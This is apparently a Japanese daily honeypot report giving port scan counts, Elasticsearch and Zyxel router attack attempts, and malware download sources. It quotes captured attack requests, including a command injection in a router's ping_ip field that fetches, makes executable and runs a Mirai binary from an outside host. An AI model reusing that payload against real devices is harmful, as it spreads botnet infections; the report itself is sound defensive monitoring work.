【ハニーポット簡易分析】Honeypot簡易分析(325日目:7/9)
※80ポートは除く
<国別検知数および検知数>
<ポート検知数(30日平均比)>
| ポート番号 | サービス | 件数 | 件数差(30日平均) |
|---|---|---|---|
| 445 | smb | 4403 | 917 |
| 23 | telnet | 868 | -423 |
| 5900 | vnc | 423 | -1736 |
| 502 | asa-appl-proto | 256 | 242 |
| 9200 | Unknown | 250 | 240 |
| 3306 | mysql | 215 | 37 |
| 3389 | rdp | 84 | -100 |
| 3307 | opsession-prxy | 82 | 36 |
| 5000 | commplex-main | 75 | 70 |
| 1962 | Unknown | 69 | 67 |
<新規マルウェアダウンロード>
Elasticsearchの脆弱性(CVE-2014-3120)を狙った攻撃を何件か検知していました。
最終的にはMiner系のマルウェアをダウンロードするものと推測されます。
| malware download | ペイロード例 |
| 103[.]83[.]157[.]46 | POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 |
| hxxp://116[.]206[.]177[.]144:93/xlk\ | GET /_search? |
| hxxp://116[.]206[.]177[.]144:93/Down[.]exe | GET /_search? |
| hxxp://116[.]206[.]177[.]144:93/xlk | GET /_search? |
Elasticsearchの脆弱性(CVE-2014-3120)を狙った攻撃を何件か検知していました。
最終的にはMiner系のマルウェアをダウンロードするものと推測されます。
◾️WoWHoneeypot
<国別検知数および検知数>
<検知パス一覧>
| wow_path_research | target | CVE | reference | count |
|---|---|---|---|---|
| / | - | - | - | 32 |
| /admin/assets/js/views/login.js | FreePBX | - | https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 | 19 |
| /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup | Zyxel | CVE-2017-6884 | 2 | |
| /index.php | - | - | - | 1 |
| /mysql/admin/index.php | PhpMyAdmin | - | - | 1 |
| /phpmyadmin/index.php | phpMyAdmin | - | - | 1 |
| /robots.txt | - | - | - | 1 |
| hxxp://110[.]249.212.46/testget | Unauthorized Relay | - | - | 4 |
<新規検知パス一覧>
/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup
→Zyxel製のルータの脆弱性を狙ったものとなります。
https://www.exploit-db.com/exploits/41782
→Zyxel製のルータの脆弱性を狙ったものとなります。
https://www.exploit-db.com/exploits/41782
<マルウェアダウンロード>
Zyxel製のルータの脆弱性からMiraiの感染を狙った攻撃となります。
https://www.virustotal.com/gui/file/50416814e217eb2d04a8b8431ef62e7bb54a57b51794bff235ff791ead0d3e37/detection
以上となります。
| malware_wowhoneypot_report | wow_path | base64_wow_decrypted_report | count |
|---|---|---|---|
| hxxp://134[.]209[.]230[.]124/bins/tron[.]mips | /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup | GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20tmp;wget%20hxxp://xxx.xxx.xxx.xxx/bins/tron.mips;chmod%20777%20tron.mips;./tron.mips%20zyxelv2 HTTP/1.1.Host: xxx.xxx.xxx.xxx.Connection: keep-alive.Accept-Encoding: gzip, deflate.Accept: */*.User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.17.1.el6.x86_64.. | 1 |
| hxxp://134[.]209[.]230[.]124/bins/tron[.]mpsl | /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup | GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20tmp;wget%20hxxp://xxx.xxx.xxx.xxx/bins/tron.mpsl;chmod%20777%20tron.mpsl;./tron.mpsl%20zyxelv2 HTTP/1.1.Host: xxx.xxx.xxx.xxx.Connection: keep-alive.Accept-Encoding: gzip, deflate.Accept: */*.User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.17.1.el6.x86_64.. |
https://www.virustotal.com/gui/file/50416814e217eb2d04a8b8431ef62e7bb54a57b51794bff235ff791ead0d3e37/detection
以上となります。
